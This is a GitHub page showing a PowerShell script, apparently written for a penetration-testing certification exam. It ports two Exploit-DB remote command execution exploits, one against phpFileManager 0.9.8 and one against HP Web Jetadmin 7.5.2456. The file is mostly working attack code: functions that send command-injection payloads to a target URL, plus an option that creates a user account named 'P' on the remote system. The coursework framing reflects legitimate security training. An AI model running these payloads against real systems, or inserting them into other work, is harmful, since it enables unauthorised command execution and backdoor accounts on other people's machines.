-
Notifications
You must be signed in to change notification settings - Fork 7
/
Exploits.ps1
146 lines (117 loc) · 4.39 KB
/
Exploits.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
## Powershell For Penetration Testers Exam Task 5 - Port any two command injection exploit from exploit-db to powershell
function Exploit-phpFileManager
{
<#
.SYNOPSYS
phpFileManager 0.9.8 - Remote Command Execution Exploit.
.DESCRIPTION
Exploit ported to powershell from https://www.exploit-db.com/exploits/37709/
# Exploit Title: Remote Command Execution
# Google Dork: intitle: PHP Remote Command Execution
# Date: 2015-07-28
# Exploit Author: John Page ( hyp3rlinx )
# Version: 0.9.8
# Tested on: windows 7 SP1
.PARAMETER Target
The target IP Address
.PARAMETER Cmd
The command to run on remote computer
.EXAMPLE
PS C:\> . .\Exploits.ps1
PS C:\> Exploit-phpFileManager -Target 127.0.0.1 -Cmd c%3A\Windows\system32\cmd.exe
PS C:\> Exploit-phpFileManager -Target 127.0.0.1 -Cmd c%3A\Windows\system32\calc.exe
.LINK
https://www.exploit-db.com/exploits/37709/
.NOTES
This script has been created for completing the requirements of the SecurityTube PowerShell for Penetration Testers Certification Exam
http://www.securitytube-training.com/online-courses/powershell-for-pentesters/
Student ID: PSP-3190
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory=$true)]
[String]
$Target,
[Parameter(Mandatory=$false)]
[String]
$cmd = "c%3A\Windows\system32\cmd.exe"
)
try{
$WebClient = New-Object Net.WebClient
$payload = "https://$target/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=$cmd"
write-verbose "Executing payload: $payload"
$webClient.DownloadString($payload)
}
Catch {
Write-Error -Message "command $cmd execution failed"
}
}
function Exploit-HPWebJetadmin
{
<#
.SYNOPSYS
HP Web Jetadmin 7.5.2456 - Remote Command Execution Exploit.
.DESCRIPTION
Exploit ported to powershell from https://www.exploit-db.com/exploits/23880/
# Exploit Title: Remote Command Execution
# Date: 2004-03-24
# Exploit Author: wirepair
# Version: 7.5.2456
.PARAMETER Target
The target IP Address.
.PARAMETER Cmd
The command to run on remote computer. Default executes whoami command
.PARAMETER AddUsr
Use this switch to create the USER account on the remote system.
.PARAMETER Port
The port of the HP Web Jetadmin service. Default set to 8443
.EXAMPLE
PS C:\> . .\exploits.ps1
PS C:\> Exploit-HPWebJetadmin -Target 127.0.0.1 -Cmd dir
PS C:\> Exploit-HPWebJetadmin -Target 127.0.0.1 -AddUsr
.LINK
https://www.exploit-db.com/exploits/37709/
.NOTES
This script has been created for completing the requirements of the SecurityTube PowerShell for Penetration Testers Certification Exam
http://www.securitytube-training.com/online-courses/powershell-for-pentesters/
Student ID: PSP-3190
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory=$true)]
[String]
$Target,
[Parameter(Mandatory=$false)]
[String]
$cmd = "whoami",
[Parameter(Mandatory=$false)]
[String]
$Port = "8443",
[Parameter(Mandatory = $false)]
[Switch]
$AddUsr
)
Try {
$WebClient = New-Object Net.WebClient
$cmd = $cmd.Replace(" ","%20")
$payload = "https://$Target" + ":" + "$Port/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([`$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20\`"|../../../../../../winnt/system32/cmd.exe%20/c%20$cmd\`")"
write-host "Executing command: $cmd" -ForegroundColor Green
write-verbose "Executing payload: $payload"
$webClient.DownloadString($payload)
}
Catch {
Write-Error -Message "command $cmd execution failed"
}
Try {
if ($AddUsr){
$WebClient = New-Object Net.WebClient
$payload = "https://$Target\:$Port/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([`$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20\`"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD\`")"
write-Host "Adding USER account to the system" -ForegroundColor Green
write-verbose "Executing payload: $payload"
$webClient.DownloadString($payload)
}
}
Catch {
Write-Error -Message "Adding USER account failed"
}
}